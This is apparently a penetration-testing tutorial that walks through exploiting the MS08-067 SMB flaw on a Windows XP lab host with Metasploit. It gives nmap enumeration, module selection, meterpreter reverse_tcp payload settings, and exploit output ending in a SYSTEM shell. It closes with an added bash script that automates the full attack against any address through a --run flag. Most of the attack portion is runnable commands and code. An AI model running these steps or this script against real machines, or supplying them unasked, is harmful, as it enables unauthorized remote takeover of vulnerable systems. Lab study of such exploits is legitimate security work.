1. Service enumeration
The Zenmap (nmap) scan of the target returned:
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
2. Vulnerability assessment
Open msfconsole and run search smb. Among the results you will see:
exploit/windows/smb/ms06_066_nwapi 2006-11-14 good Microsoft Services MS06-066 nwapi32.dll
exploit/windows/smb/ms06_066_nwwks 2006-11-14 good Microsoft Services MS06-066 nwwks.dll
exploit/windows/smb/ms06_070_wkssvc 2006-11-14 manual Microsoft Workstation Service NetpManageIPCConnect Overflow
exploit/windows/smb/ms07_029_msdns_zonename 2007-04-12 manual Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)
exploit/windows/smb/ms08_067_netapi 2008-10-28 great Microsoft Server Service Relative Path Stack Corruption
exploit/windows/smb/ms09_050_smb2_negotiate_func_index 2009-09-07 good Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
3. In msfconsole, select ms08_067_netapi. It is the only match ranked "great", and it targets the Server service over SMB (port 445), which the scan showed open on a Windows XP host:
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
4. After choosing the exploit, set the payload:
set PAYLOAD windows/meterpreter/reverse_tcp
Then set LHOST and RHOST. LHOST is the attacker's IP, the address the reverse shell connects back to; RHOST is the target's IP. A typo in either is the usual reason the handler never receives a connection.
set LHOST 192.168.43.1 (attacker IP)
set RHOST 192.168.43.128 (target IP)
set LPORT 4444
Verify the settings with show options:
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.43.128 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST 192.168.43.1 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
5. Type exploit to launch the attack. With Automatic Targeting the module first fingerprints the host (OS, service pack, language) and picks the matching target; the Fingerprint line should agree with what enumeration showed, because a wrong return address crashes the Server service instead of returning a shell. Once the Meterpreter session opens, type shell to drop into cmd.exe on the target; the Server service runs as SYSTEM, so the shell does too.
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.43.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.43.128
[*] Meterpreter session 1 opened (192.168.43.1:4444 -> 192.168.43.128:1036) at 2012-09-11 00:56:55 +0700
meterpreter > shell
Process 380 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
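The whole procedure above, wrapped in a shell script as an added example (not part of the original post): it validates the two addresses, emits the msfconsole commands of steps 3 to 5 as a Metasploit resource file with the module's check command inserted before exploit, and optionally runs nmap's smb-vuln-ms08-067 script against the target first. The lab addresses are the post's; the --run flag, the LHOST/RHOST/LPORT environment variables and the nmap pre-check are this example's own assumptions.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): automate steps 2-5 above as a
# Metasploit resource script and sanity-check the addresses before launching.
# Addresses default to the lab values from the post; override via environment.
# Assumption: msfconsole and nmap are on PATH when invoked with --run.
set -u

LHOST="${LHOST:-192.168.43.1}"      # attacker (handler) address
RHOST="${RHOST:-192.168.43.128}"    # target address
LPORT="${LPORT:-4444}"

# Accept only a dotted-quad IPv4 address with each octet in 0..255.
valid_ipv4() {
  ip="$1"
  case "$ip" in
    ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
  esac
  oldifs="$IFS"; IFS=.
  set -- $ip                 # split into octets (function-local positional args)
  IFS="$oldifs"
  [ "$#" -eq 4 ] || return 1
  for octet in "$@"; do
    [ "$octet" -le 255 ] || return 1
  done
  return 0
}

# Emit the msfconsole commands of steps 3-5 as a resource script. The module's
# `check` command tests for the bug before `exploit` fires, so a patched host
# is reported rather than attacked blindly.
make_rc() {
  lhost="$1"; rhost="$2"; lport="$3"
  cat <<EOF
use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $lhost
set RHOST $rhost
set LPORT $lport
show options
check
exploit
EOF
}

# Optional pre-check with nmap's NSE script for this bug. The script only runs
# when unsafe=1 is given because its probe can crash an unpatched Server service.
nmap_precheck() {
  nmap -p 445 --script smb-vuln-ms08-067 --script-args=unsafe=1 "$1"
}

main() {
  valid_ipv4 "$LHOST" || { echo "bad LHOST: $LHOST" >&2; exit 2; }
  valid_ipv4 "$RHOST" || { echo "bad RHOST: $RHOST" >&2; exit 2; }
  if [ "${1:-}" = "--run" ]; then
    rc="$(mktemp)"
    make_rc "$LHOST" "$RHOST" "$LPORT" > "$rc"
    nmap_precheck "$RHOST"
    msfconsole -q -r "$rc"   # -q: no banner, -r: execute the resource file
    rm -f "$rc"
  else
    # Default: print the resource script so it can be reviewed before use.
    make_rc "$LHOST" "$RHOST" "$LPORT"
  fi
}

main "$@"
```

Run it without arguments to review the generated commands, then with --run in the lab to execute them. A resource file runs its commands in order regardless of what check reports, so read the check line before the exploit line scrolls past; if check does not report the host as vulnerable, the exploit attempt is where a crash rather than a session is likely.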